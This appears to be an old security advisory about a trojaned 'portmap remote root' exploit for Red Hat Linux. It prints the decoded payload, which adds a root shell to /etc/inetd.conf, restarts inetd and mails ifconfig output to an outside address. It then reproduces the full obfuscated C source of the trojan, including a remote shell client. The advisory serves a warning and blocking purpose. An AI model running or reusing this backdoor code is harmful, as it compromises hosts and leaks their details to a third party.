A Trojaned version of the portmap exploit is being spread on the net. The
Trojan claims to exploit the portmap vulnerability on Redhat boxes, but
what it really does is add a 'root shell' (unprotected access, also called
a backdoor) to the inetd.conf file and sends other info like your IP
address by executing ifconfig. All this information is sent to the email:
[email protected]. If your firewall can block outgoing mail
according to e-mail address, watch this e-mail as it indicates one of your
users used the backdoored exploit. |
|
The actual "shell code" that gets executed follows: /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail [email protected] 2>&1 2>/dev/null The exploit code that is currently distributed (DO NOT USE): /* Do not run unless you know what you are doing , and DONT RUN IT AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them your IP address. PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a TROJAN) portmap remote root linux exploit (TROJAN) (no stack patch) by horizon - [email protected] This was tested against redhat box with 2.2.9 kernel. (shouldn't need offset) BIG thanks to stran9er who wrote this shellcode!! greets to: #!ADM and users @ el8.org ;) */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #define NOP 0x90 #define RET 0xbfffec90 #define PORT 5760 #define pmap_proc_p system char *shellcode = "\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9" "\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4" "\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73" "\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55" "\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a" "\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1" "\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62" "\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4" "\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99" "\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f"; int max(int x, int y) { if(x > y) return(x); return(y); } void rshell(char *host) { int sockfd, maxfd, n; struct sockaddr_in cli; char sendln[1024], recvln[1024]; struct hostent *hp; fd_set rset; if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(-1); } if((hp = gethostbyname(host)) == NULL){ perror("gethostbyname"); exit(-1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(PORT); cli.sin_addr.s_addr = inet_addr(host); if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(-1); } printf("root shell found!\n"); strcpy(sendln, "uname -a; pwd; id;\n"); write(sockfd, sendln, strlen(sendln)); FD_ZERO(&rset); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(sendln, sizeof(sendln)); fgets(sendln, sizeof(sendln)-2, stdin); write(sockfd, sendln, strlen(sendln)); } if(FD_ISSET(sockfd, &rset)){ bzero(recvln, sizeof(recvln)); if((n = read(sockfd, recvln, sizeof(recvln))) == 0){ printf("Connection closed.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(recvln, stdout); } } } void main(int argc, char **argv) { CLIENT *cli; int i = 0, offset = 53; char *portmap; char *buf; if(argc < 2){ printf("usage: %s <ip> [offset]\n", argv[0]); exit(-1); } if((portmap = (char *) malloc(154)) == NULL) { perror("malloc"); } while(*shellcode) { portmap[i] = *shellcode - offset; shellcode++; i++; } pmap_proc_p(portmap); printf("sending shellcode... connecting to remote host\n"); rshell(argv[1]); strcpy(buf, portmap); exit(-1); } A few Trojaned ADM exploits seem to be floating around as well: ADMnlockd portmap.c ADMmountd2.tgz ADM has set up a 'FAKES' archive on their official ftp server. You can find all those fake ADM exploits at: ftp://adm.freelsd.net/pub/ADM/FAKES/ |
|
Additional information | |
The above information was provided by: goatkiller and Wakko Ellington Warner-Warner III.
|